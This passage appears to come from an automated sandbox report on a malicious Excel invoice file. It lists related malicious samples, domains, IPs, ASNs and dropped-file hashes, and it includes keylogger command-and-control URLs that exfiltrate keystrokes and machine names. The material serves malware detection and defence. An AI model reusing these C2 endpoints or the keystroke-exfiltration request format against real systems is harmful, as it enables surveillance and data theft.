                                                • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
                                                invoice.exeGet hashmaliciousBrowse
                                                • shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
                                                http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-IIGet hashmaliciousBrowse
                                                • thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/
                                                104.22.0.232Request_for_Quotation.xlsmGet hashmaliciousBrowse
                                                • cutt.ly/gdvAeui

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                cutt.lyShipping Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                Shipping Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                Shipping Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                wHrBhrpp3q.csvGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                SecuriteInfo.com.Exploit.Siggen2.64979.12090.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                SecuriteInfo.com.Exploit.Siggen2.64979.3440.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                file.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                file.xlsGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                file.xlsGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                File.xlsGet hashmaliciousBrowse
                                                • 104.22.1.232
                                                File.xlsGet hashmaliciousBrowse
                                                • 172.67.8.238
                                                shopphongtinh.comclient.exeGet hashmaliciousBrowse
                                                • 202.92.6.10
                                                Invoice.xlsmGet hashmaliciousBrowse
                                                • 202.92.6.10
                                                SA Covid-19 Funding Connection.xlsmGet hashmaliciousBrowse
                                                • 202.92.6.10
                                                invoice.exeGet hashmaliciousBrowse
                                                • 202.92.6.10

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                VNPT-AS-VNVNPTCorpVNqkN4OZWFG6.exeGet hashmaliciousBrowse
                                                • 221.132.33.88
                                                FMFF7xj5.exeGet hashmaliciousBrowse
                                                • 103.207.39.131
                                                rJz6SePuqu.dllGet hashmaliciousBrowse
                                                • 123.19.40.157
                                                Order inquiry.exeGet hashmaliciousBrowse
                                                • 103.207.38.182
                                                Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exeGet hashmaliciousBrowse
                                                • 203.162.4.149
                                                http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                • 113.160.161.75
                                                http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/Get hashmaliciousBrowse
                                                • 113.160.161.75
                                                http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lmGet hashmaliciousBrowse
                                                • 113.160.161.75
                                                OK093822333448.docGet hashmaliciousBrowse
                                                • 103.255.237.196
                                                http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/Get hashmaliciousBrowse
                                                • 113.160.250.165
                                                DETAILS.jarGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                Readmore Details.exeGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                SecuriteInfo.com.Trojan.PackedNET.405.16508.exeGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                detail-information.exeGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                INFORMATIONS.doc.......exeGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                executed.exeGet hashmaliciousBrowse
                                                • 103.207.39.83
                                                _000819.exeGet hashmaliciousBrowse
                                                • 113.161.148.81
                                                _000822.exeGet hashmaliciousBrowse
                                                • 113.161.148.81
                                                _000819.exeGet hashmaliciousBrowse
                                                • 113.161.148.81
                                                _000824.exeGet hashmaliciousBrowse
                                                • 113.161.148.81
                                                CLOUDFLARENETUShttps://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                • 104.18.215.67
                                                1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                • 104.20.138.65
                                                https://akljsdhfas.selz.com/?Get hashmaliciousBrowse
                                                • 104.18.108.36
                                                quotation_0087210_pdf.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                • 104.24.105.107
                                                1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                INQUIRY.exeGet hashmaliciousBrowse
                                                • 104.27.152.230
                                                PO Quotation.jarGet hashmaliciousBrowse
                                                • 104.20.22.46
                                                doc2227740.xlsGet hashmaliciousBrowse
                                                • 104.27.172.15
                                                PO Quotation.jarGet hashmaliciousBrowse
                                                • 104.20.23.46
                                                doc2227740.xlsGet hashmaliciousBrowse
                                                • 104.27.173.15
                                                TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                • 104.18.57.249
                                                d11311145.xlsGet hashmaliciousBrowse
                                                • 104.27.173.15
                                                23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                • 104.23.99.190
                                                d11311145.xlsGet hashmaliciousBrowse
                                                • 104.27.173.15
                                                PO #5618896.gz.exeGet hashmaliciousBrowse
                                                • 104.23.98.190
                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                07DYwxlVm4.exeGet hashmaliciousBrowse
                                                • 104.27.133.115
                                                9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                • 104.27.133.115

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                05af1f5ca1b87cc9cc9b25185115607d1099008FEDEX_090887766.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                VQ01173428.docGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SIN029088.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Mal.Generic-S.18660.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Mal.Generic-S.27944.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                SecuriteInfo.com.Heur.5466.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                WayBill Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                WayBill Invoice.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                Untitled 20201030.docGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                request.2890.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                request613.xlsGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                UW_Medley Storage_20201030.xlsmGet hashmaliciousBrowse
                                                • 104.22.0.232
                                                Payment_Order_20201111.xlsxGet hashmaliciousBrowse
                                                • 104.22.0.232

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58936
                                                Entropy (8bit):7.994797855729196
                                                Encrypted:true
                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):326
                                                Entropy (8bit):3.123186963792904
                                                Encrypted:false
                                                SSDEEP:6:kK/swwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                MD5:F8CD22EA1D752D0A58C546F0AC6CA9C8
                                                SHA1:3A7467DA9ADA7285221A925D3E7FD4B27E4EDDCD
                                                SHA-256:59F36F22001C9D2656507517742B5764231B691EEB915DE2F1AA36A6DC79DE4B
                                                SHA-512:D9FB9559B4ACFB344F24DCD30A4D3AE986E06A382774E89B5E14345D48F756B35C27A37759F4D4A6C97A6EB5147E44C41811749064E47B0AFDA401811A622C1D
                                                Malicious:false
                                                Reputation:low
                                                Preview: p...... ...........[....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                C:\Users\user\AppData\Local\Temp\CCEE0000
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):59586
                                                Entropy (8bit):7.872396235530871
                                                Encrypted:false
                                                SSDEEP:1536:/CyZD1js3bSmSb4wjE7zF0Rhdv1hQzMrTYK:/5jjs3bMb4GE0DrTYK
                                                MD5:D7B180B8ACC7118C6985DD4D14334E3A
                                                SHA1:72E39D040945309D94FE9609FD868BF65B72E1F5
                                                SHA-256:09F0C0B7ABF272A20D18D1464A73FB81E7A3C055A2BB6E826504060E1D6943CD
                                                SHA-512:AD6B670D21DC1E71CA263C42613DA5002AEF117C296CE8EF45449459E47AE7C256314E7B941DE4D4CED01EADD52F82F606D9B9C149E15860B0001ECC6E32D632
                                                Malicious:false
                                                Reputation:low
                                                Preview: .TMo.1..W..X.Z.Mz...%.$=6......X...v........XPrYym...gf|...ZbL..]....I...7......R...x..[cb7../.u.T....9..B$...}@G'3.-d..s.@.`...h.]H.2.\...&.;........7..7g...^.j..._..A.T.=..`..L...)nS.g3-./....3.|.,.I.l.&.. 'd..Z..W....r.k.}.=.^&j..#...,.A..x.q1.~.O...q%..."fnAF..`j....ExD...A....ny}.nA.g..+.z.....a.....K%.S...#..o....T.(..9fO.......6....i.]...!..".?9R..z....P.^K.._|<.=.)]*...!.D.xy..z...@D...m..."u..{.e^*T..E7.'........PK..........!..._.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Temp\CabDFA6.tmp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58936
                                                Entropy (8bit):7.994797855729196
                                                Encrypted:true
                                                SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                MD5:E4F1E21910443409E81E5B55DC8DE774
                                                SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                C:\Users\user\AppData\Local\Temp\TarDFA7.tmp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):152533
                                                Entropy (8bit):6.31602258454967
                                                Encrypted:false
                                                SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Nov 19 16:56:46 2020, atime=Thu Nov 19 16:56:46 2020, length=8192, window=hide
                                                Category:dropped
                                                Size (bytes):867
                                                Entropy (8bit):4.455870114794823
                                                Encrypted:false
                                                SSDEEP:12:85QWu0tCLgXg/XAlCPCHaXtB8XzB/J96X+WnicvbObDtZ3YilMMEpxRljKEJTdJU:85d9U/XTd6j7oYe2Dv3qHhrNru/
                                                MD5:E367CD6AEFE3E192B7F2441F14DFFBC8
                                                SHA1:BB93A1FBF978B1399D1F1E5C184A4D69BD320971
                                                SHA-256:F9E4E19BD3D356D188FF2B0254A2936280D5754F34EB0133EDA8CB1D580F14F2
                                                SHA-512:90088F697645B4961306F25DA4EEF17B2EB98D8025145A2A316E3CFA0EBCE39A35F96B98445969625C4E673E44D7D7F4D8857E448248B34BF3FF8F59014AB1C0
                                                Malicious:false
                                                Preview: L..................F...........7G..3..X....3..X..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....sQ....Desktop.d......QK.XsQ..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\065367\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......065367..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.LNK
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Thu Nov 19 16:56:46 2020, atime=Thu Nov 19 16:56:46 2020, length=82432, window=hide
                                                Category:dropped
                                                Size (bytes):2088
                                                Entropy (8bit):4.546616668434316
                                                Encrypted:false
                                                SSDEEP:48:8q/XT0jFWttkyLt8BQh2q/XT0jFWttkyLt8BQ/:8q/XojFW/d58BQh2q/XojFW/d58BQ/
                                                MD5:308925A589FCC3CD23F46824D47B4410
                                                SHA1:6DFF690FD78A47B8FB295180AC90DA5B5D339F1E
                                                SHA-256:87ABCE1EC7E9B6E27E0C3FAEB72A4E8AB1E62E1E4706BAB7FEBAC4C5C313268E
                                                SHA-512:EFC12E04F88693ED2CA14D21B7A5AEB85BECEA0948B24D7E73101F1257B3CDB87777897F6B5F4D48D0568919E3D13FB2A9106AD6D77081F14CE7DA07A41F8795
                                                Malicious:false
                                                Preview: L..................F.... ........{..3..X.....s.X.....B...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.....sQ.. .PROFOR~1.XLS..V.......Q.y.Q.y*...8.....................P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.......~...............-...8...[............?J......C:\Users\..#...................\\065367\Users.user\Desktop\Proforma Invoice.xls.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.r.o.f.o.r.m.a. .I.n.v.o.i.c.e...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......065367..........D_....3N...W...9F.C....
                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):101
                                                Entropy (8bit):4.7170989234879075
                                                Encrypted:false
                                                SSDEEP:3:oyBVomMQDMILGMXd6ltaQILGMXd6lmMQDMILGMXd6lv:dj6GKg2afKgKGKgC
                                                MD5:BC11129FCE6D9C1A695193CDCB97B257
                                                SHA1:2EC83352C02CCC01E7513A894800E1219605F24B
                                                SHA-256:31376558D616FB12266F87483A5097CA308C0EA58FCE25853A90FD33BCFE2140
                                                SHA-512:03435DE22EEF6F71B2A327744ABD8B1A1FA8E4C04656A66DC9EBFBD7FE1C493EE857AED2B95AB4C1BB0A9A1D14FE2A6254C1F32453BBE3BC216E52E8EF7EBEC9
                                                Malicious:false
                                                Preview: Desktop.LNK=0..[xls]..Proforma Invoice.LNK=0..Proforma Invoice.LNK=0..[xls]..Proforma Invoice.LNK=0..
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0AYPJJNXJIAU1ZU8MY2M.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF514RYFPTGCAGWGDYOS.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VT0OYA3U3UFN4XWUY8ST.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.5814100525711527
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqLVqvsqvJCwozz8hQCsMqLVqvsEHyqvJCworhzvlYL+HEf8ObdlUVlIu:cy8ozz8yIHnorhzvGf8OYIu
                                                MD5:21683EF64DE19D5C5CB7D13091E6590F
                                                SHA1:F7F597C8641642F8704F0C3E83E3F00029053D22
                                                SHA-256:41A8B890A253EEE9117E8B248F847FAA260EBB3F9AD21F8B9927DA0CFF8FA3A0
                                                SHA-512:15EE18822DD845DD82D0D1F54D4A1FDD7E44814463AD068BF066FCB3A16ECF72977E07BCAF33695011C314AEE6AD70F5C35137DEF88B1C96C8214E339D6127ED
                                                Malicious:false
